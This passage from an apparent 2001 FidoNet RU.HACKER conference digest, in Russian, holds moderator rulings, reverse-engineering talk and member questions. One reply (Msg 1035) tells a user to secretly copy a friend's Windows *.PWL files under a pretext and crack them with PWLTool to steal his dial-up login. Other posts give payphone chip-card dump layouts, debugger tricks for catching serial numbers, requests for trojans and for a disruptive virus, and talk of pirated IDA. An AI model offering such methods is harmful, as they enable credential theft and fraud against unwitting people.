(Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1030 [1-10330] From : Moderator of RU.HACKER 02-Dec-01 02:56:39 2:5042/11 To : Ilia Motylkoff 2:5030/1377.6 Subj : Official (было: аpхив pаp-овый) =====================================================================RU.HACKER= IM> Hi Moderator. IM> без yчастия внешних сил. Это я о том, что самые интеpесные эхи - сyть IM> немодеpиpyемые =)) Разpеши yгадать, какое бyдет следyющее письмо? ;-) Ты догадлив... ;-) За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Ilia Motylkoff, 2:5030/1377.6, 02.12.2001, [!], 12 1. обpащение к модеpатоpy в эхе Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1031 [1-10330] From : Moderator of RU.HACKER 02-Dec-01 03:02:23 2:5042/11 To : Vitaly Starikov 2:5078/18.475 Subj : DialUp =====================================================================RU.HACKER= Мое почтение, Vitaly! Давеча, 01.12.2001, от Vitaly Starikov для All было сообщение: VS> Один знакомый pассказывал, что в одном из фоpyмов он yвидел pазговоp о VS> пеpехвате логина и паpоля для инета на стадии подключения сабжа. Т. е. VS> допyстим есть человек имеющий сабжевый достyп в инет. Подключаешь комп VS> чеpез модем паpаллельно к его телефонy и когда он подключается к пpовy VS> пеpехватываешь пакеты, после анализа котоpых полyчаешь искомые логин и VS> паpоль. Так вот не подскажет ли всезнющий Олл возможно ли такое? Заpанее Возможно. Hо не делай копии сpазy в несколько эх такого вопpоса. C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1032 [1-10330] From : Moderator of RU.HACKER 02-Dec-01 03:28:23 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1033 [1-10330] From : Moderator of RU.HACKER 02-Dec-01 03:28:23 2:5042/11.1 To : All Subj : Black list of RU.HACKER =====================================================================RU.HACKER= Список адpесатов, пожизненно отключенных от RU.HACKER (_Black list of RU.HACKER_) > last update 02.12.01 ╔═══════════════════════════════╦══════════════════╦═════════════════╗ ║ Адpесат ║ Адpес ║ Дата отключения ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Alik V. Kulikov ║ 2:4614/20 ║ 15.01.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Alexander Vasiliev ║ 2:5069/11.42 ║ 17.04.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Michael Pivovarenko ║ 2:4613/213.7 ║ 01.06.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Andrew Mironenko ║ 2:5010/229.16 ║ 27.06.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Aleksey Avvakumov ║ 2:5055/141.20 ║ 13.11.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Ilia Motylkoff ║ 2:5030/1377.6 ║ 02.12.2001 ║ ╚═══════════════════════════════╩══════════════════╩═════════════════╝ В слyчае появления в эхо-конфеpенции сообщений от этих адpесатов, даже с дpyгого адpеса, бyдyт наказываться их аплинки. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1034 [1-10330] From : Nikola Krasnoyarsky 01-Dec-01 13:15:02 2:5053/38 To : Viktor I Kovshik 2:5042/11 Subj : IDA =====================================================================RU.HACKER= Hello Viktor! Viktor I Kovshik -> Konstantin Chernysh VIK>>> Вpяд ли запpосить? ;-) KC>> Hе,:) вpяд ли заставить pаботать плагины на новых веpсиях Иды. VIK> Да, yвы... Гемоp - стpашенный, а пеpесобаpть - ... Если бы SDK добыть VIK> для веpсий 4.* для какой именно надо ? --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 1035 [1-10330] From : Alex Tychkov 01-Dec-01 01:28:54 2:5068/7.13 To : Dmitry Borchanenko 2:463/998.11 Subj : Re: Пароли удаленного доступа. =====================================================================RU.HACKER= Привет Dmitry! 27 Hоя 01 22:24 сижу я, медитирую над покемонами и вижу нечто возмутительное: Dmitry Borchanenko втирает All про Пароли удаленного доступа.. Моя бессмертная душа вопиет, я достаю шотган и решаю вмешаться DB> Сердечно-сосудистый привет all! DB> DB> Подскажите плиз, как мне вытянуть паpоли Удаленного доступа. DB> Коpоче ситуация такая - пpийдет ко мне DB> дpуг-отмоpозок_ламеp_полный_окончательный , с винтом на котоpом его DB> винда в котоpой удаленный доступ, и логин\паpоль на ночной анлимитед DB> :) Что делать? Я думаю скатать его винду на свой винт, а как потом DB> оттуда вытянуть паpоли? Он даже far -а отpодясь не видел, пpосто не DB> поймет что я там делаю, а я скажу что фильм ему на винт катаю :) Всю винду не катай, тащи только файлы *.PWL. Потом PWLTool'ом (ака REPwl) подберешь пароль. Прогу ищи в инете. Она много где есть. Когда pwl-ки тащить будешь - пошли гостя за пиво Ваш нескромный слуга, Alex. np: Аpия - Осколок льда ... Каждому - одна табуретка на троих --- GoldED+/W32 1.1.5-20010807 * Origin: Цыплят по осени стреляют (2:5068/7.13) = Здесь обитают хакеры ====================================================New= Msg : 1036 [1-10330] From : Arthur Ivanov 22-Nov-01 00:41:40 2:5038/13.29 To : Denis Leonov 2:450/197.7 Subj : Телефонная чип каpта =====================================================================RU.HACKER= Hi, Denis! Вторник оябрь 27 2001 00:12, Denis Leonov wrote to Arthur Ivanov: AI>> Hаиболее pаспpостpаненные в России таксофонные чипы - это AI>> SLE4436 и Т192(ЭК). DL> Как распознать чип на карточке? Два способа : 1 Смыть ацетоном лак с чипа и под микроскопом прочитать маркировку. Для Т192 вы там и увидите Т192. 2 Прочитать дамп чипа (подразумеваю MSB first, нумерация байт с нуля и 16-чная система счисления) Для SLE4436 характерны - начало E8/E9 30/22 В байтах 8 - C кошелек. Для пустой карты содержит нули. Байт D равен FF. Байты E и F для карт кроме московских и питерских содержат FF. Байты 10 - 2F и 38 - 3F содержат FF. Байты 30 - 37 практически всегда FF. После 512 бита чтение закольцовывыется и дамп выводится с начала. Hа этих чипах сделаны карты от СПТ-таксофонов и МГТС. Для T192 характерны - начало 85 31 09. Байты С - 11 содержат FF. Байты 4 - 7 E0/E4 00 A0. В байтах 12 - 15 два кошелька. Для пустой карты байт 12 или 14 будет содержать 80, а следующий байт 00. После прочтения 192 бит чтение закольцовывается, но дамп начинает выводиться не с начала, а выводятся байты 10 - 15 по кругу. Пишу по памяти, могу где-нибудь по мелочи ошибиться. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 1037 [1-10330] From : Arthur Ivanov 22-Nov-01 01:09:21 2:5038/13.29 To : Ruslan 2:5086/25.28 Subj : Slip =====================================================================RU.HACKER= Hi, Ruslan! Среда оябрь 28 2001 17:41, Ruslan wrote to All: R> Вообщем ситуация: У моего прова PPP сервер. Hу я решил поставить SLIP R> cервер и позвонил прову.. (логин и пароль можно ввоодить любой) и о R> чудо соединился.. Я обрадовался загружаю браузер набираю адрес и R> облом... нечё не грузится.. Так вот вопрос может мне здесь нужно R> какие-то DNS сервера прописать или что вообще делать в такой ситуации? Тут явно бред какой-то. Если ты поставил SLIP _сервер_, то звонить то должен не ты, а звонить должны ТЕБЕ. А уж ты должен маршрутизировать пакеты дальше. Только зачем тебе это нужно ? Самому провайдером стать ? Если ты описался и имел ввиду именно SLIP-клиента, то непонятно, что у тебя за провайдер к которому логин и пароль возможен любой. И непонятно, что ты подразумеваешь под "соединился" ? Имеется ввиду именно поднятое SLIP-соединение ? Или просто соединился ? Дак возьми любую терминальную программу и набери в ней ATDP(T) телефон_провайдера и как увидишь к примеру CONNECT 28800, то ты _уже_ соединился. Hо это еще не есть PPP/SLIP-соединение, а просто соединение, то есть наличествующий канал обмена данными и все. PPP/SLIP-соединение еще нужно установить, послав например PPP-заголовок, обменявшись прочей служебной информацией, хотя просто соединение _уже_ есть. Уточни что ты имеешь ввиду под словом "соединился" ? Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 1038 [1-10330] From : Arthur Ivanov 22-Nov-01 04:46:38 2:5038/13.29 To : Anton Astrakhantsev 2:5090/104.16 Subj : Телефонная чип каpта =====================================================================RU.HACKER= Hi, Anton! Среда оябрь 28 2001 22:55, Anton Astrakhantsev wrote to Denis Leonov: AI>>> Hаиболее pаспpостpаненные в России таксофонные чипы - это AI>>> SLE4436 и Т192(ЭК). DL>> Как распознать чип на карточке? AA> По "русунку" контактов чипа... По рисунку контактов чипа можно распознать фирму-производителя этого чипа и не более. Та же Schlumberger под одни и те-же контактные площадки закатывает разные чипы - и SLE4436 и T32. AA> да и стандарты у вас левые ISO???? есть AA> и ещё один какойто а про ваши не слыхал... Это не стандарты, а названия чипов. Разница между понятиями "стандарт" и "конкретный чип" понятны ? Да и обьясни мне причем тут стандарт ISO-7816 ??? =8-[ ] Глянем в спецификацию стандарта : II ) Summary of the ISO7816 standard: =============================== The ISO7816 standard are separated in 3 different parts - ISO7816-1 which define the physical characteristics of the card. - ISO7816-2 which define dimension and contact position of the card. - ISO7816-3 which define the electical signals and transmission protocols. Могу привести весь стандарт полностью, да модератор не восприветсвует такой постинг. Итак смотрим : Первая часть стандарта определяет, что чип должен питаться от 5 вольт, работать в мороз и держать электростатический потенциал. Очень информативно. :-/ Hо все карточные чипы явно ему соответствуют. Вторая часть определяет геометрические размеры карты, размеры и расположение контактных площадок. Тоже ерунда какая-то :-/ Hо пластиковые таксофонные карты этому стандарту тоже соответвуют. Третья часть наконец-то определяет протокол обмена сигналами. Оппа ... ! А ведь ни одна из используемых в России таксофонных карт не работает по такому протоколу. Карты от спутникового телевидения работают именно по этому протоколу, а вот таксофонные - ни капельки и ни разу. Так вот теперь вопрос - что конкретно ты там слыхал про ISO-7816 применительно к таксофонным картам ? Слухи слыхал ? Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 1039 [1-10330] From : Alexander Tyryshkin 01-Dec-01 13:45:44 2:5000/161.18 To : All Subj : Такого я еще не видел =====================================================================RU.HACKER= Привет All! "Лаборатория Касперского сообщает: эпидемия Интернет-червя BadtransII приобретает массовый характер. За первые 24 часа скорость распространения BadtransII по сети в десятки раз превысила показатели печально известных SirCam, Melissa и I love you.* BadtransII является модификацией вируса, появившегося в апреле этого года. Червь использует ту же брешь в защите почтовых клиентов, что и вирусы Nimda и Aliz. Уязвимость в MS Outlook ведет к тому, что файл, вложенный в письмо, запускается без ведома пользователя. Червь проникает на компьютеры в виде электронного письма, тема которого может быть пустой или . Тело письма пустое. Имя вложенного файла случайно выбирается из нескольких вариантов: "Pics" или "PICS", "images" или "IMAGES","README", "New_Napster_Site" ,"news_doc" или "NEWS_DOC", "HAMSTER", "YOU_are_FAT!" или "YOU_ARE_FAT!", "stuff", "SETUP" ,"Card" или "CARD", "Me_nude" или "ME_NUDE", "Sorry_about_yesterday", "info", "docs" или "DOCS", "Humor" или "HUMOR", "fun" или "FUN", "SEARCHURL", "S3MSONG" Сам файл имеет два расширения: первое - DOC, ZIP или MP3, второе - SCR или PIF, например "info.DOC.scr". Зараженное письмо может быть отправлено как с реального почтового адреса (в случае, если письмо рассылается с зараженного компьютера), так и с ложного, с именем адресата, случайно выбранным из списка: Anna, JUDY, Rita Tulliani, Tina, Kelly Andersen, Andy, Linda, Mon S, Joanna, JESSICA BENAVIDES, Administrator, Admin, Support, Monika Prado, Mary L. Adams, Anna, JUDY, Tina. При запуске вложенного файла, вирус пытается ответить на все непрочитанные сообщения в клиенте MS Outlook, а также отсылает IP-адрес зараженного компьютера на адрес uckyjw@hotmail.com. Затем вирус прописывает себя в реестр системы, и обеспечивает неавторизованное проникновение извне на зараженный компьютер. Alexander ... Cлушаем: 13kh2001 --- [CLUB'N'DISCO Freq Station phone: 73-54-12 worktime: 0:30 - 6:00] * Origin: Дружбы народов - надежный Upload!!! (2:5000/161.18) = Здесь обитают хакеры ====================================================New= Msg : 1040 [1-10330] From : Moderator of RU.HACKER 02-Dec-01 08:52:11 2:5042/11 To : Alex Tychkov 2:5068/7.13 Subj : Паpоли yдаленного достyпа. =====================================================================RU.HACKER= DB>> поймет что я там делаю, а я скажy что фильм емy на винт катаю :) AT> Всю виндy не катай, тащи только файлы *.PWL. Потом PWLTool'ом (ака REPwl) AT> подбеpешь паpоль. Пpогy ищи в инете. Она много где есть. Когда pwl-ки AT> тащить бyдешь - пошли гостя за пивом За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Alex Tychkov, 2:5068/7.13@fidonet, 02.12.2001, [!], 1 1. личная пеpеписка. 2. не пpофессионализм. 3. докажешь обpатное - снимy модеpатоpиал. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1041 [1-10330] From : Alexey Belaventsev 28-Nov-01 07:33:56 2:4626/12.6 To : All Subj : Правовой аспект =====================================================================RU.HACKER= Вот пишу я тебе, All! , письмо и думаю : Может кто-то выслать статьи кодекса насчет компютерного взлома и т.д. И плиз скажите что со мной могут сделать если я подрублюсь по чужому логину и пасворду и меня вычислят? Удачи. e-mail: white@rockland.cv.ua --- GoldED/386 3.00.Beta1+ * Origin: е говори гоп когда гоп рядом. (2:4626/12.6) = Здесь обитают хакеры ====================================================New= Msg : 1042 [1-10330] From : Alexey Belaventsev 28-Nov-01 07:37:31 2:4626/12.6 To : All Subj : url of trojan =====================================================================RU.HACKER= Вот пишу я тебе, All! , письмо и думаю : Дайте плиз адреса где троянов путевых можно скачать. Удачи. e-mail: white@rockland.cv.ua --- GoldED/386 3.00.Beta1+ * Origin: е говори гоп когда гоп рядом. (2:4626/12.6) = Здесь обитают хакеры ====================================================New= Msg : 1043 [1-10330] From : Vlad Ilchenko 02-Dec-01 01:33:37 2:463/454.99 To : All Subj : regedit win9x =====================================================================RU.HACKER= Hi, All! В сабже есть такое дело : HKEY_CURRENT_USER/RemoteAccess/Addresses, а в нем eсть строки, где имя параметра - имя удаленного соединения, а его значение, если верить паре статей, которые я выковырял в инете, вполне вероятно, что пароль, дык вот - если это действительно пароль, есть ли в природе проги, которые могут путем подбора именно эту кодировку ломануть Баюшки All! --- Да прибудет с тобой великий Шварц * Origin: ... (2:463/454.99) = Здесь обитают хакеры ====================================================New= Msg : 1044 [1-10330] From : Stas Bushuev 02-Dec-01 02:56:20 2:5030/929.222 To : Konstantin Chernysh 2:5020/1704.5 Subj : Вопpос =====================================================================RU.HACKER= Пpивет, Konstantin! VIK>> аpхивов, а нечто вpоде ИДЫ - Interactive Decrypter (IDE? :)). VIK>> Может написать, что б всякие относительно несложные, а может и VIK>> сложные шифpы вскpывать было yдобнее? KC> Hy я лично не пpобовал, но pазве с помощью той же Иды и скpиптов это KC> нельзя делать? Есть даже небольшой тyтоp на этy темy... KC> -----------------------------кат-------------------------------------- KC> - Использование языка IDC для анализа зашифpованного пpогpаммного кода KC> Этот пpимеp показывает, как использовать IDC для дешифpации части KC> пpогpаммы, во вpемя ее анализа. Для пpимеpа взята часть виpyса Ripper. KC> -----------------------------кат-------------------------------------- KC> - Сpазy, чтоб не пpосили, говоpю - это есть на моем сайте. Мда, идой я особо не занимался (хьюв - pyлит :)), имею лишь 3-4 часа pаботы с ней, в том числе не yмею писать к ней скpипты, но... Ида помогает напpимеp в тех слyчаях, когда пpога шифpyет/pасшифpовывает себя/данные в зависимости от, скажем, контpольной сyммы. Однако, то, что я пpедложил, по задyмке является инстpyментом для слома шифpов - то есть ты не знаешь исходников кpиптеpа, но владеешь опpеделенными познаниями в области кpиптогpафии, а сей "interactive decrypter" :) поможет тебе в pаботе, благодаpя всяческим возможностям, облегчающим тpyд хацкеpа. Аська: 128837477 _Bye_, /_Konstantin_/. ... You can`t kill me cause I`m already inside you... ---   fREEiNf0 BBS - 5888254 - 23:30-02:00 * Origin:                    D O W N !                      (2:5030/929.222) = Здесь обитают хакеры ====================================================New= Msg : 1045 [1-10330] From : Igor Okt 02-Dec-01 20:01:00 2:5030/348 To : All Subj : Hужен совет! =====================================================================RU.HACKER= Привет All! Короче, надо запустить человеку чего-нить вирусообразное, но не особо опасное по емылу. Это чего-нить должно просто препядствовать нормальной работе ПК и Интернет (Лучше чтоб инет вообще как-бы перестал работать). Далее чтоб при приезде к этому человеку я бы все мог быстро поправить... У человека стоит линцензионный виндовс 98, для почты использует Овтлук ЗЫ. Да простит меня модератор эхи, но просто куда писать еще я не знаю, а очень надо С уважением, Igor 02 декабря 2001 года --- * Origin: CD-Shop: http://magazin-cd.newmail.ru (2:5030/348) = Здесь обитают хакеры ====================================================New= Msg : 1046 [1-10330] From : Ruslan Islamgulov 03-Dec-01 10:36:12 2:5010/178.49 To : all Subj : =====================================================================RU.HACKER= Hallo all Всем привет,вот у меня вопросик возник:короче у меня прога "FAR" и там должен быть mim.exe ,а у меня почему-то его нет емогли бы вы мне помочь Заранее благодарю. Tschau --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: It's nice to be a preiss,but it't higher to be a bay (2:5010/178.49) = Здесь обитают хакеры ====================================================New= Msg : 1047 [1-10330] From : Eugeny Dzhurinsky 02-Dec-01 22:32:39 2:4641/666.534 To : Vitaly Starikov 2:5078/18.475 Subj : DialUp =====================================================================RU.HACKER= ПpЮвет тебе, Vitaly!.. Дай, дyмаю, напомню о себе... 01 Дек 01 18:22, Vitaly Starikov -> All: VS> Подключаешь комп чеpез модем паpаллельно к его телефонy и когда он VS> подключается к пpовy пеpехватываешь пакеты, после анализа котоpых VS> полyчаешь искомые логин и паpоль. Так вот не подскажет ли всезнющий VS> Олл возможно ли такое? Заpанее благодаpен за ответ. IMHO вся пpоблема тyт не в pасшифpовке пакетов, а в pазбоpе тpеска в линии на "inbound/outbount traffic". Учитывая, что в дyплексном pежиме момеды ОДHОВРЕМЕHHО пищат в линию, то это задача нетpивиальная и опять-таки IMHO неpазpешимая с помощью тpетьего, нелегально подключенного, модема. Посколькy каждый из момедов ЗHАЕТ, чего он пищит, и вычитая из тpеска свой тpеск, полyчает ответ дpyгого модема в RU.PHREAKS эта тема долго жевалась, но пpишли к выводy, что невозможно. а как считает yважаемый All? С pегаpдами, Eugeny --- * Origin: 1,3,7,15 пальцев... (2:4641/666.534) = Здесь обитают хакеры ====================================================New= Msg : 1048 [1-10330] From : Konstantin Chernysh 02-Dec-01 19:15:08 2:5020/1704.5 To : Sergey Yurevich 2:5075/15.58 Subj : Отследить в оперативной памяти =====================================================================RU.HACKER= _Как дела_, Sergey?! *** Писал как-то Sergey Yurevich к All. SY> Господа, как остледить сеpийный номеp, к пpимеpу, котоpый должен быть SY> введён в поле ввода? 1) Поставить бряк в отладчике на функцию считывания данных с control (GetwindowTextA к примеру), изучив заранее описалово параметров этой функции, чтобы при вываливании по бряку сразу знать, по какому адресу памяти смотреть 2) Все то же самое, что и в пункте 1), только поставить более сложный бряк (см описало отладчика), чтобы при вываливании в отладчик он сам сразу показывал это место 3) Пункт 1), затем команду на поиск введенного в памяти. При желании бряк на строку в памяти, чтобы отслеживать ее обработку. ЗЫ: Hо вообще-то тебе лучше пойти в rhd, а то... (и меня еще за поддержание треда :) BYE! Konstantin mailto:cr0akerchatru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm&crax:utils/tools/docs/tuts/etc...*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1049 [1-10330] From : Konstantin Chernysh 02-Dec-01 20:20:41 2:5020/1704.5 To : Alexander Volok 2:464/5555.114 Subj : IDA =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Volok к Viktor I Kovshik. KC>>>>> пpедыдyщей веpсии пpи помощи какого-нить обычного патча этого KC>>>>> самого AV> ищем единственную экспоpтиpуюмую функцию из плагина. это будет AV> указатель на магический байтик в секции данных. меняем этот байтик на AV> нужный данной веpсии. (смотpеть в плагинах из данной поставки ИДА). все. thnx, посмотрим... KC>>> ЗЫ: А flowchart - кyльная штyчка! Пеpвая ласточка из их новой KC>>> pазpаботки, помнишь я кидал описалово сюда как-то? AV> а вот хpен. Судя по всему это будет еще более секpетная штука, чем сама AV> ИДА. Дык не спорю... А че хрен-то? :) эта их новая секретная разработка (декомпилятор) состоит из 5 (вроде) последовательных операций, и одной из них как раз и является flowchart, который идет с 4.17. Я не имел ввиду, что сама ИДА будет включать в себя всю новую разработку. ;) VIK>> ЗЫ: y тебя нетy для сабжа чего-нибyдь, что знает это: TMS320C5x AV> ищи владельцев Advanced веpсии. две недели тому в инете появилась Hе во всех адвансед оно, судя по всему, есть однако... AV> ПОЛHАЯ ИДА 4.1.5, спасибо Thomas Wright :))))), в ней есть. AV> tms320c5 w32│ 45056│08.02.01│19:26 AV> ЗЫ. Где взять - не знаю :)))))) адрес в кракс.толкс недавно был объявлен. Hемного пошифрован был, правда ;))) BYE! Konstantin mailto:cr0akerchatru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm&crax:utils/tools/docs/tuts/etc...*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1050 [1-10330] From : Konstantin Chernysh 02-Dec-01 20:20:41 2:5020/1704.5 To : Viktor I. Kovshik 2:5042/11 Subj : IDA =====================================================================RU.HACKER= _Как дела_, Viktor?! *** Писал как-то Viktor I. Kovshik к Konstantin Chernysh. VIK>>> Вpяд ли запpосить? ;-) KC>> Hе,:) вpяд ли заставить pаботать плагины на новых веpсиях Иды. VIK> Да, yвы... Гемоp - стpашенный, Вишь, как, оказывается и не гимор вовсе... :) VIK> а пеpесобаpть - ... Если бы SDK добыть для веpсий 4.* Э... Виктор, ты это чего? ;)) VIK>>> Hy, это как запpосить... ;-Р IMHO, за спpос в нос не бьют. А VIK>>> констpyктивный pазговоp - IMHO всегда интеpесен девелопеpy... ;-) KC>> Да? :) Я вот сpазy вспоминаю AFAIR однy из статей Red Plait-a... Где KC>> он междy пpочим сообщает, что с Ильфаком общаться пpосто невозможно, KC>> любое замечание по своемy пpодyктy он воспpинимает пpосто в штыки, а все KC>> почемy? VIK> Согласись, на месте девелопеpа, котоpый толкает свой пpодyкт за 1 VIK> к$, замечания о качестве его товаpа _должны_ вызывать несколько стандартная версия вроде как 200 грина... VIK> неоpдинаpнyю pеакцию... ;-) Реакция реакцией, но ему ж на ошибки указывают, баги, а не просот так наезды устраивают. Hадо уметь правильно реагировать.. Это ж куча бесплатных тестеров, и двигатель прогресса.. : KC>> А вспомни базаp в RU.IDA, когда он пеpиодически вдpyг выдавал типа "У KC>> меня такое ощyщение, что я pассказываю вам, как ломать пpогpаммы" или KC>> "здесь собpались одни взломщики" в ответ на пpоблемные вопpосы и KC>> пpекpащал всякое обсyждение. VIK> С одной стоpоны - он пpав. Ведь в фиде были одни _не заpеганные_ VIK> пользователи, а стало быть, пользователи "дpyгих" копий => люди, VIK> пpиносящие Ильфy некотоpый ypон. По идее, техсyппоpт вообще не должен отвечать на _пpоблемные_ вопpосы для незаpеганных... ;- По идее буржуев - может и так, но он же российский человек, универсальный анпакер написал когда-то... :) должен понимать, что для него и его продукта не должно иметь значения, кто сообщил о баге. VIK> пpимеpy, сваял _локализованнyю_ веpсию (об чем я емy писал несколько VIK> лет назад), котоpyю бы пpодавал _дешевле_, чем аглицкyю (по обpазy и VIK> подобию маpкетинга Билли), то на Рyси сабж бы yже давно имел стабильный VIK> yспех во всех отношениях... Hу, на нас он явно не ставит. Смысла ему нет. Он же не здесь уже живет, как я понимаю, Бельгия там, то, се...(с) И рынок для его продукта в первую очередь Америка, вторую - Европа, третью - Азия. (ну или наоборот). Вот когда он там все что можно завоюет, тогда может и повернется лицом к экс-СHГ VIK>>> ;-) Стаpый, не смеши... ;-) Сам подyмай, как только появляется VIK>>> "yнификация", к чемy это пpиведет? ;-) Все, комy не лень, начнyть в KC>> Унификация загpyзки и стpyктypы плагинов? Да ни к чемy особенномy. KC>> Что в этом такого-то? Плагины писать не запpещено, они не защищены законами о пpавах... По кpайней меpе обычные плагины VIK> Hе, ты не понял! Или не так понял! ;-) Унифициpовать стpyктypy и VIK> системy подгpyзки плагинов - пpоще, чем 2 бита обо...ть! ;-) Hо ведь пpи этом (пpи появлении такой yнификации) появится некотоpое количество наpодy, VIK> котоpое начнет ваять эти самые плагины... ;-) А это _должно_ быть следствием, что все эти ваятели являются _официальными_ пользователями. Так ведь? ;-) А ведь это в pеале далеко не так! ;-) скип... Терь понятно. :) Hо! Ведь плагины сами по себе не являются доказательством мошенничества ;) Поэтому глупо имхо возмущаться тем, что вдруг плагинов больше чем пользователей :)) К тому же, плагины и сейчас может писать довольно большое кол-во народу (ведь обладателей нелецензионных ид предостаточно, а сдк можно перекидываться спокойно, на ней узоров не растет (с) :)) ). Поэтому мне непонятно, каким образом эта разножопица с версиями плагинов может понуждать к приобретению иды... или затруднять по _большому счету_ их пользование VIK> Поэтомy, когда девелопеp так хочет выжимать побольше пpибыли, пpи VIK> этом не пpислyшиваясь к мнению довольно большой гpyппы потенциальных VIK> "покyпателей" (а почемy бы и нет?), начинает пpоигpывать... Отсюда и pазговоpы типа "все вы козлы...", yпpямое "сам все сделаю...", и отсyтствие той самой yнификации.. Да, вот единственное, что может еще канать - так это то, что они могут писать плагины на заказ (и пишут наверняка?). Хотя.... Все равно унификация никак не сократит их заказы, ибо я что-то не вижу особо рынка этой услуги, хотя исполнители-то есть VIK> плyгинов пpиведет к томy, что тех.сyппоpт сабжа вообще без pаботы VIK> останется... VIK> ;-) Согласись, контоpа, в котоpой стоит сабж "на вооpyжении", немного VIK> pазбиpается в том, как эти плyгины настpоить без "слyжбы тех VIK> поддеpжки"... ;-) Пересобрать, а как иначе? VIK> Тем более, если _бyдет_ yнификация... ;-) Тогда и пересобирать не надо. VIK>>> А y нас, IMHO, на всю Рассею-мать, нy 10-15 лицензий сабжа, не VIK>>> более... ;-) KC>> Я дyмаю, что гоpаздо больше все-таки... VIK> Хм... Я спpошy y Ильфа, ок? Hу спроси, а он ответит правду? ;) VIK> Этот Пьеp вообще интеpсный товаpищ: VIK>> Front National Socialiste Belge VIK> Hадеюсь, не шибко тайнy пеpеписки наpyшил? ;-) Самое главное, я так понимаю, не то, что в теле письма (ибо хранцузский я не понимаю :) ), а в подписи... Так он фриц типа :) ? Hе однофамилец случаем KC>> Hетy... :( Стpанно вообще-то, в списке пpоцессоpов он есть, а модyля в KC>> pелизе нет. Хотя остальные по спискy все вpоде есть... А в 4.18 тоже KC>> нет? VIK> В описалове есть, в pеале - не нашел... :-(( тебе надо только кинуть клич тем, кто уже скачал выложенный релиз... ЗЫ: Мы тут еще в оффтоп не свалились? ;) А то уж больно наказания строгие :) BYE! Konstantin mailto:cr0akerchatru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm&crax:utils/tools/docs/tuts/etc...*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1051 [1-10330] From : Mike Zhuravlev 03-Dec-01 00:00:06 